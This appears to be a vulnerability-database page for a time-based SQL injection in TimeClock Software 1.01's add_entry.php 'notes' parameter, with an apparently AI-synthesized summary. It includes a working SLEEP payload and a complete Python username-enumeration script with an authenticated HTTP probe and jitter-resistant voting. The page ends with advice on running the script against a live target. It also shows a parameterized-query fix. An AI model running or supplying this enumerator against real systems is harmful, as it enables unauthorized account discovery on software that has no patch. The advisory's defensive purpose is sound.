CVE-2020-37005
Description
TimeClock Software 1.01 contains an authenticated time-based SQL injection vulnerability that allows attackers to enumerate valid usernames by manipulating the 'notes' parameter. Attackers can inject conditional time delays in the add_entry.php endpoint to determine user existence by measuring response time differences.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
TimeClock Software 1.01 authenticated time-based SQL injection in add_entry.php allows username enumeration via the notes parameter.
Vulnerability Overview
TimeClock Software 1.01 contains an authenticated time-based SQL injection vulnerability in the add_entry.php endpoint. The notes parameter is not properly sanitized, allowing an attacker to inject SQL conditional statements that introduce time delays based on the truth of a condition [1]. Specifically, the attacker can use a payload like ' OR IF((SELECT username FROM user_info WHERE username='...')='...', SLEEP(5), NULL)=' to test for the existence of specific usernames [2].
Exploitation Details
Exploitation requires prior authentication as a valid user [1]. The attacker sends crafted POST requests to add_entry.php with the malicious notes parameter. By measuring the server's response time, the attacker can determine whether a specified username exists: a delay of several seconds (5 seconds with the SLEEP(5) payload above) indicates a true condition (user exists), while a response at normal latency indicates otherwise [2]. In practice the attacker first measures the baseline latency of a benign request and repeats each probe, since network jitter can otherwise turn a slow response into a false positive. This technique allows systematic enumeration of all registered usernames without relying on error messages or differences in response content.
Impact and Mitigation
Successful exploitation enables an attacker to enumerate valid usernames, which can serve as a precursor to further attacks such as brute-force password guessing or targeted social engineering. The software is no longer actively maintained; the vendor's website appears outdated with no security updates released [3]. Users are advised to implement input validation and parameterized queries, or migrate to a supported alternative, as no official patch is available [2].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
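The following is an added example, not code from the TimeClock Software project or from the cited references. It ties the Exploitation Details and the Impact and Mitigation sections together: it builds the conditional-delay payload described above, shows how a string-concatenated INSERT (hypothetical; the page does not show the real add_entry.php query, and the time_entries table is an assumption) turns that payload into executable SQL, shows that a parameterized query stores the same payload as inert text, and runs the timing-based enumeration with a threshold and majority vote so that one jittery response is not misread as a hit. The HTTP probe uses only the 'notes' parameter from the advisory; any other form field is an assumption. The simulated probe is a constructed stand-in for the target so the example runs offline and instantly.

```python
import itertools
import re
import sqlite3
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

DELAY_S = 5  # delay injected via SLEEP(), as in the advisory's payload


def build_payload(username: str, delay_s: int = DELAY_S) -> str:
    """Value for the 'notes' parameter: the advisory's payload with one
    concrete username. user_info.username comes from the advisory."""
    if "'" in username:
        # A quote in the probed name would alter the injected SQL itself.
        raise ValueError("probe username must not contain a single quote")
    return (f"' OR IF((SELECT username FROM user_info WHERE username='{username}')"
            f"='{username}', SLEEP({delay_s}), NULL)='")


def vulnerable_query(user_id: int, notes: str) -> str:
    """Hypothetical string-concatenated INSERT. The leading quote of the
    payload closes the literal, so IF(..., SLEEP(), NULL) becomes SQL."""
    return f"INSERT INTO time_entries (user_id, notes) VALUES ({user_id}, '{notes}')"


def parameterized_insert(user_id: int, notes: str) -> str:
    """Mitigation: bind the value instead of concatenating it. Uses an
    in-memory SQLite table (assumed schema) and returns what was stored."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE time_entries (user_id INTEGER, notes TEXT)")
    conn.execute("INSERT INTO time_entries (user_id, notes) VALUES (?, ?)",
                 (user_id, notes))
    return conn.execute("SELECT notes FROM time_entries WHERE user_id = ?",
                        (user_id,)).fetchone()[0]


def make_simulated_probe(existing: Iterable[str], base_latency_s: float = 0.2,
                         delay_s: int = DELAY_S,
                         network_stalls: Iterable[float] = (0.0,)) -> Callable[[str], float]:
    """Constructed stand-in for a vulnerable server: returns the elapsed
    seconds it would show, plus a cycling network stall, without sleeping."""
    known = set(existing)
    stalls = itertools.cycle(network_stalls)
    pattern = re.compile(r"WHERE username='([^']*)'")

    def probe(notes: str) -> float:
        match = pattern.search(notes)
        name = match.group(1) if match else ""
        return base_latency_s + next(stalls) + (delay_s if name in known else 0.0)
    return probe


def make_http_probe(url: str, session_cookie: str,
                    delay_s: int = DELAY_S) -> Callable[[str], float]:
    """Real probe: authenticated POST to add_entry.php, returning wall-clock
    seconds. Not exercised here; the cookie header name is an assumption."""
    def probe(notes: str) -> float:
        data = urllib.parse.urlencode({"notes": notes}).encode()
        req = urllib.request.Request(url, data=data,
                                     headers={"Cookie": session_cookie})
        start = time.perf_counter()
        with urllib.request.urlopen(req, timeout=delay_s * 3) as resp:
            resp.read()
        return time.perf_counter() - start
    return probe


def enumerate_usernames(probe: Callable[[str], float], candidates: List[str],
                        delay_s: int = DELAY_S, repeats: int = 3) -> Dict[str, bool]:
    """Classify each candidate by response time. The threshold is half the
    injected delay, and each candidate is probed `repeats` times with a
    majority vote so a single slow response does not count as a hit."""
    results: Dict[str, bool] = {}
    for name in candidates:
        payload = build_payload(name, delay_s)
        hits = sum(1 for _ in range(repeats) if probe(payload) >= delay_s / 2)
        results[name] = hits * 2 > repeats
    return results


if __name__ == "__main__":
    # Every third response is stalled by 4 s of "network" latency; the vote
    # still classifies bob (absent) correctly.
    probe = make_simulated_probe(["admin", "alice"], network_stalls=(0.0, 0.0, 4.0))
    print(vulnerable_query(1, build_payload("admin")))
    print(enumerate_usernames(probe, ["admin", "bob", "alice"]))
```

Against a real target, swap make_simulated_probe for make_http_probe with a valid session cookie and keep repeats at 3 or more; raise delay_s if the baseline latency is close to delay_s / 2.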
Affected products
- TimeClock Software, range: = 1.01
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.